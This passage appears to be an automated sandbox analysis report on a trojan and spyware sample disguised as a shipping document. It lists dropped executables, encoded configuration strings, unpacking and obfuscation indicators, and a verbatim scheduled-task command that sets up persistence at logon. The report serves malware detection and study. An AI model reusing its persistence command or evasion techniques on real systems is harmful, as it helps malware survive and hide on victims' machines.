                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Isgeprf.exe.2.dr, Client/Settings.csBase64 encoded string: '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'
                    Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: dhcpmon.exe.3.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: dhcpmon.exe.3.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Icda.exe.1.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: Icda.exe.1.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Isgeprf.exe.2.dr, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: Isgeprf.exe.2.dr, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/14@13/2
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_052910DA AdjustTokenPrivileges,
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_052910A3 AdjustTokenPrivileges,
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Consignment Document PL&BL Draft.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_01
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{a60f1e04-b281-49b0-9733-22b28c2ea6d7}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeFile created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeJump to behavior
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''
                    Source: Consignment Document PL&BL Draft.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Consignment Document PL&BL Draft.exeVirustotal: Detection: 21%
                    Source: unknownProcess created: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe 'C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe {path}
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe 'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe'
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Icda.exe 'C:\Users\user\AppData\Local\Temp\Icda.exe'
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Isgeprf.exe 'C:\Users\user\AppData\Local\Temp\Isgeprf.exe'
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe 'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe'
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit
                    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''
                    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''
                    Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\VLC2.exe C:\Users\user\AppData\Local\Temp\VLC2.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\VLC2.exe 'C:\Users\user\AppData\Local\Temp\VLC2.exe'
                    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess created: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe {path}
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe 'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe'
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess created: C:\Users\user\AppData\Local\Temp\Icda.exe 'C:\Users\user\AppData\Local\Temp\Icda.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess created: C:\Users\user\AppData\Local\Temp\Isgeprf.exe 'C:\Users\user\AppData\Local\Temp\Isgeprf.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess created: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe 'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\VLC2.exe 'C:\Users\user\AppData\Local\Temp\VLC2.exe'
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Consignment Document PL&BL Draft.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: Consignment Document PL&BL Draft.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Icda.exe, 00000003.00000002.488044286.0000000002DD5000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: Icda.exe, 00000003.00000002.493930043.0000000005670000.00000002.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeUnpacked PE file: 2.2.Rczgwoxvqzh.exe.c00000.0.unpack
                    .NET source code contains potential unpackerShow sources
                    Source: Consignment Document PL&BL Draft.exe, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.Consignment Document PL&BL Draft.exe.ba0000.0.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Icda.exe.1.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Icda.exe.1.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.Consignment Document PL&BL Draft.exe.c70000.1.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.0.Consignment Document PL&BL Draft.exe.c70000.0.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: dhcpmon.exe.3.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: dhcpmon.exe.3.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 3.0.Icda.exe.a40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 0_2_00BA5286 push es; retf
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 1_2_00C75286 push es; retf
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 1_2_016786A2 pushfd ; iretd
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 1_2_0167FA42 pushfd ; iretd
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 1_2_05786BF7 push E801005Eh; retf
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeCode function: 4_2_00714122 push eax; ret
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeCode function: 4_2_00712A66 push 0000003Eh; retn 0000h
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeCode function: 4_2_00712F81 push eax; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.86672838882
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.98388170142
                    Source: Icda.exe.1.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
                    Source: Icda.exe.1.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
                    Source: dhcpmon.exe.3.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
                    Source: dhcpmon.exe.3.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
                    Source: 3.2.Icda.exe.a40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
